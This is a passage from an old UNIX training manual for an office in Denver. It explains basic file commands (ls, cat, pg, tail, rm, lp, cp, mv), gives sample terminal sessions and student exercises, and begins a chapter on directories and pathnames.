+ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The first octal digit assigns user permissions of read, write and +execute. The second digit assigns the group permission to read +and execute. The last digit sets the others permission to read +and execute too. +3.2 Listing Contents of Directories + + +The ls command is used to display file names and their +characteristics. Since file names are stored in directories, ls +actually reads directory files. Executing ls with no flags or +arguments simply lists the names of the files that exist in your +current working directory. The initialization files will not be +listed. + + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: ls [options] [dir1[dirn]] º +º º +º options - see man pages for a complete list º +º º +º dir1[dirn] - one or more directory names º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +The -a flag will cause the hidden (initialization) and all other +filenames to be displayed. + + +The -C flag causes the output to be changed from single-column to +multi-column display. + + +The -F flag adds a character to the end of each displayed +filename: + + / indicates a directory + * indicates the file is executable. + blank indicates a plain or ordinary file + + +The -l flag causes detailed information to be printed for files +in the directory. This information includes: + + file type (directory, block special, character special, + fifo special, symbolic link, or ordinary file) + access modes + number of links + ownership + group affiliation + size in bytes + date and time of last modification + filename +Without a filename argument, ls displays information about the +current working directory. The output is automatically sorted +alphabetically by default. + + +Example: + +................................................................. +. $ls . +................................................................. + +The following example provides a long listing of the current +working directory. + +Example: + +................................................................. +. $ls -l . +................................................................. + + +This example shows the ls command with no arguments so it uses +the default, the current working directory. The argument could +be a relative or absolute directory name. + +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ls -la ³ +³ total 975 ³ +³ drwxrwxr-x 4 teacher class 2048 Jul 16 17.56 . ³ +³ drwxr-xr-x 60 root 1536 Jul 13 14:18 .. ³ +³ -rwx------ 1 teacher class 4210 May 1 08:27 .profile ³ +³ -rwxr-xr-x 1 teacher class 1948 May 12 13:42 memo ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +3.3 File Classifications + + +The file command will classify files according to their contents. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: file [options] º +º º +º file1[filen] - one or more filenames to analyze º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + A few of the classifications that the file command displays are +shown below. The results of using the file command are not +always correct. + + English text + ascii text + c program text + cannot stat + commands text + data + directory + empty + executable + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $file speople ³ +³ speople: commands text ³ +³ $file test ³ +³ test: directory ³ +³ $file mail ³ +³ mail: data ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +By convention, files beginning with a dot (.) are called +initialization files or 'hidden files'. These files describe +your environment to the shell. They are sometimes called 'dot +files'. + +By convention, files that end with: + + .c are C source code programs + .f are Fortran source code programs + .o are object programs + .a are archive files +3.4 Displaying Files + + +The cat command displays the contents of a file. The command cat +is an abbreviation for catenate. This command will read each file +in sequence and write it to the monitor screen. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: cat [options] [file1[filen]] º +º º +º options - see man pages for a complete list º +º º +º file1[filen] - one or more file names º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +If no filename is given, or the argument - is encountered, cat +reads from standard input. + +Sample session: + +................................................................. +. $cat . +................................................................. + +This is the simpliest example but not very exciting. The cat +command will get its input from the keyboard. Everything that is +typed will be displayed on the monitor. + +If an argument is given to the cat command that file will be +displayed on the monitor. + +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $cat main.c ³ +³ main () ³ +³ { ³ +³ printf ("hello from main!\n\n"); ³ +³ printf ("calling function1!\n\n"); ³ +³ funct1(); ³ +³ printf ("back from function1!\n\n"); ³ +³ printf ("calling function2!\n\n"); ³ +³ funct2(); ³ +³ printf ("that's it!\n\n"); ³ +³ } ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +Several files can be displayed on the monitor one after the other +by separating the filenames with a space. + +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $cat main.c main.f ³ +³ main () ³ +³ { ³ +³ printf ("hello from main!\n\n"); ³ +³ printf ("calling function1!\n\n"); ³ +³ funct1(); ³ +³ printf ("back from function1!\n\n"); ³ +³ printf ("calling function2!\n\n"); ³ +³ funct2(); ³ +³ printf ("that's it!\n\n"); ³ +³ } ³ +³ program calling ³ +³ write(6,100) ³ +³ 100 format('Hello from main!',/) ³ +³ write(6,110) ³ +³ 110 format(' Calling subroutine1!',/) ³ +³ call sub1 ³ +³ write(6,120) ³ +³ 120 format(t15' Back from subroutine1!',/) ³ +³ write(6,130) ³ +³ 130 format(' Calling subroutine2!',/) ³ +³ call sub2 ³ +³ write(6,140) ³ +³ 140 format(t15' Back from subroutine2!',/) ³ +³ write(6,150) ³ +³ 150 format(' Thats all, folks!') ³ +³ end ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +If the file contains more lines than can be displayed on the +screen the display will continue to scroll until the last line +has been displayed then the prompt will be redisplayed. This can +be a problem if you intend to read the text. Be prepared to stop +the screen so it can be read. +The pg command displays the contents of a file one screen at a +time. It allows the user to perform string searches and to +scroll backwards. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: pg [options] [file1[filen]] º +º º +º options - see man pages for a complete list º +º º +º file1[filen] - one or more files to paginate º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ $pg memo ³ +³ What's Happening ³ +³ by Pam Hajny ³ +³ Denver Office ³ +³ ³ +³ With IRM Training: ³ +³ ³ +. A Reclamation-wide workshop was held in early October to . +. . +. . + +³ three groups; CYBER, VAX, and other (PC/LAN, scientific, ³ +³ : ³ +³ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Twenty three lines of the file will appear and the : (colon) +prompt will appear on the last line. To have the next twenty +three line of the file appear, simply press (Ret). If you don't +want to see anymore of the file, enter a q (for quit) and the +shell prompt will be redisplayed. +The following UNIX command is useful for viewing the end of a +file without having to display the entire file. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: tail [options] [file1] º +º º +º options - see man pages for a complete list º +º º +º file1 - the file to display, if none is given use º +º standard input º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +The tail command displays the last 10 lines of file by default. +The tail command accepts a -N flag to display the last N lines. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $tail memo ³ +³ data communication between the ASC IBM and other Reclamation computers. ³ +³ Asynchronous communication can be accomplished with the same terminals ³ +³ we use for other computer tasks, over the same lines and through the MICOM ³ +³ port selectors. Currently, host-to-host communications is accomplished ³ +³ over a line between the IBM and the CYBERs. The software that supports ³ +³ this communication is called NJEF. Although the capability has been there ³ +³ for some time, we have recently been working with ASC personnel to ³ +³ improve its reliability and accessibility. For CYBER users, there is ³ +³ an NJEF Users' Guide available which can be requested through the Hotline ³ +³ (303) 236-4567. ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +3.5 Removing Files + + +The rm command will remove the entries for one or more files from +a directory. If an entry was the last link to the file, the file +will be destroyed. Removal of a file requires write permission +to the directory itself, but neither read nor write permission to +the file itself. The format for the rm command is: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: rm [options] º +º º +º options - see man pages for a complete list º +º º +º file1[filen] - one or more files to remove º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ls ³ +³ memo ³ +³ tdata ³ +³ subdir ³ +³ $rm memo ³ +³ $ls ³ +³ tdata ³ +³ subdir ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The file memo has been deleted from the current working +directory. +Multiple files can be deleted by separating the filenames with a +space. + +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ls ³ +³ memo ³ +³ tdata ³ +³ subdir ³ +³ $rm memo tdata ³ +³ $ls ³ +³ subdir ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +3.6 Printing Files + + +The lp command routes a file to a printer. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: lp [-d] [-n] [file1[filen]] º +º º +º dest - destination (default set by administrator) º +º º +º number - number of copies (default is 1) º +º º +º file1[filen] - one or more files to be printed º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +If no file name is mentioned the standard input is assumed. The +filename dash (-) stands for standard input and may be supplied +in conjunction with named files. The order in which the +filenames appear is the order in which they will be printed. + +The printers in Denver have the following destination names: + + Mannesman 910 laser printer - mtlzr + + Mannesman 600 line printer - mt_600 (Denver default) + +If no specific printer is given the default printer will be +selected. The following example will print one copy (default) of +the file called test_285 to the line printer (default). + +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $lp test_285 ³ +³ request id is mt_600-1271 (1 file) ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +It is possible to specify the printer as shown in the following +example. In this case, we specified the default printer. + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $lp -dmt_600 test_286 ³ +³ request id is mt_600-1272 (1 file) ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + + +To print two copies of a file called test_287 on the laser +printer in Building 53 in Denver, enter the following command: + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $lp -dmtlzr -n2 test_287 ³ +³ request id is mtlzr-1273 (1 file) ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +3.7 Print Status + + +The lpstat command will print information about the current +status of the printer system. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: lpstat [options] º +º º +º options - see man pages for a complete list º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +If no options are given, the lpstat command will print the status +of all requests made to lp by the user. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $lpstat ³ +³ mtlzr-1274 teacher 22560 Jul 16 09:05 on mtlzr ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The first field is the remote id of the print job. The username +is next and the size (in bytes) of the print file. The date and +time are next and finally the name of the printer. + +One of the options available is -t. This option will print all +of the printer status information. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $lpstat -t ³ +³ scheduler is running ³ +³ system default destination: mt_600 ³ +³ device for mt_600: /dev/rlp000 ³ +³ device for mtlzr: /dev/rt0002 ³ +³ mt_600 accepting requests since Sep 19 16:09 ³ +³ mtlzr accepting requests since Sep 19 16:43 ³ +³ printer mt_600 is idle. enabled since Jul 3 16:52 ³ +³ printer mtlzr is idle. enabled since Jul 3 16:51 ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +This is an example of the kinds of information available from the +lpstat command. +3.8 Canceling Print Jobs + + +The cancel command will cancel printer requests made by the lp +command. The command line arguments can be either request id's +(these are returned by the lp command) or the printer name. If +you specify the request id, the cancel command will stop the job +even if it is currently printing. If you specify the printer +name, the job currently being printed will be canceled. In +either case, the cancellation of a request that is currently +printing will free the printer to print the next request. + + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: cancel <[ids] [printer]> º +º º +º ids - request ids (returned by lp command) º +º º +º printer - printer name º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $lp -dmt_600 contest ³ +³ request id is mt_600-1280 (1 file) ³ +³ $cancel mt_600-1280 ³ +³ request "mt_600-1280" canceled ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +3.9 Copying Files + + +A user may make a copy of a file if he has read access to that +file. The cp command can be used to copy the contents of one +file to another. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: cp º +º º +º file1[filen] - one or more source files º +º º +º target - file or dirname º +º º +º file1 and target cannot be the same and º +º if the target is a file its' contents are º +º destroyed. º +º º +º If target is a directory, then the contents º +º of the source file(s) is copied to that º +º directory. º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $cp contest memo ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +This will cause a copy of the file contest to be made into a file +named memo. If memo doesn't exist, it will be created. If it +already exists, it will be written over. The cp command is +nondestructive; that means that the source file will remain +intact. + +The cp command can also be used to copy several files into +another directory. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $cp file1 file2 /user0/teacher ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +A copy of file1 and file2 has been sent to the directory (in this +case, the target directory) /user0/teacher. The user of cp will +own the newly copied files. +3.10 Moving Files + + +A user may move a file only if he has write access to that file. +The mv (move) command can be used to rename one file. + + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: mv º +º º +º file1[filen] - one or more source files º +º º +º target - file or dirname º +º º +º file1 and target cannot be the same and º +º if the target is a file its' contents are º +º destroyed. º +º º +º If target is a directory, then the contents º +º of the source file(s) are moved to that º +º directory. º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mv contest memo ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +This will have the effect of changing the name of the file +contest into memo. The permissions on the file will remain the +same. The move command is destructive. That means the source +file no longer exists. + +The mv command can also be use to move files from one directory +to another. + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mv file1 file2 /user0/teacher ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The files, file1 and file2, have been sent to the directory +/user0/teacher. They have been "moved" and no longer reside in +the current directory. The owner remains the same when a file is +moved. +Workshop 3 + +This workshop will reinforce your understanding of the topics +presented in this chapter. Login to the Multimax using the +username and password given to you by the instructor. Each +student should complete the entire workshop. You might need to +work in a team on the computer exercises. + +DESK EXERCISES + + +1. List four types of files. + + + + + + +2. What does the file command do? + + + + + + +3. The ls command will display the contents of the current + working directory. What does the -F option do? + + + + + +4. What command is used to display the contents of an ordinary + file? + + + + + +5. What command would you use to append one file to the end of + another? + + + + + +6. What is the lp command? + + + + + Continue on the next page +7. How can you find out the status of your print job? + + + + + +8. What command would you enter to cancel a print job called + mt_600-1131? + + + + + +9. What command will copy the contents of one file to another? + + + + + +10. What does mv do? + + + + + +11. What do the following file protections indicate? + + rwx------ + + + + rwxr-xr-x + + + + --------- + + + rwxr--r-- + + + + + + + + + + + + + Continue on the next page +COMPUTER EXERCISES + + +12. Log into the Multimax. + + + + + +13. Execute the file command on the files listed below. Record + the output in the space provided. + + + a. .profile + + + + b. /bin/vax + + + + c. /dev/console + + + + +14. Which of the above files is readable? + + + + + + +15. Enter the command to display the contents of the current + working directory. Hint: ls + + + a. How many files are listed? + + + + b. Type ls -a + + + + c. How many entries are listed? + + + + + + Continue on the next page + d. Which entries were not listed in your original output + of ls? + + + + + + + +16. How does the output of ls -a and ls -Ac differ? + Try it. + + + + + + +17. How many fields are displayed for each entry when you + execute ls -l? What are the fields? + + + + + +18. What are the current permissions on .profile? + + + + + +19. Change permissions on .profile so that no one (including + you) has any access to the file. + (Hint: Use the chmod command) + + + + + +20. Without changing the permissions, list the contents of the + file named .profile to the screen. + What happened? Why? + + + + + + + + + + + Continue on the next page +21. Change the permissions on .profile to + + u - read, write, execute + g - read + o - read + + + + +22. Type cat .profile. What happened? Do you know why? + + + + + + +23. Enter pg memo. What does this command do? + + + + + + + +24. Send one copy of the file called memo to the laser printer. + + + + + + +25. Logout of the Multimax and the Annex. + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +4. DIRECTORIES + + +A directory is a file whose sole job is to store file names and +related information. All files, whether ordinary, special, or +directory, are contained in directories. + +The directory in which you find yourself when you first login is +called your home directory. You will be doing much of your work +in your home directory and subdirectories that you'll be creating +to organize your files. + + + +4.1 Absolute/Relative Pathnames + + +As we saw earlier, directories are arranged in a hierarchy with +root (/) at the top. The position of any file within the +hierarchy is described by its pathname. Elements of a pathname +are separated by a /. A pathname is absolute if it is described +in relation to root, so absolute pathnames always begin with a /. +These are some example of absolute filenames. + + /etc/passwd + /users/sjones/chem/notes + /dev/rdsk/Os3 + +A pathname can also be relative to your current working +directory. Relative pathnames never begin with /. Relative to +user sjones' home directory, some pathnames might look like this: + + chem/notes + personal/res + +To determine where you are within the filesystem hierarchy at any +time, enter the command to print the current working directory. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: pwd º 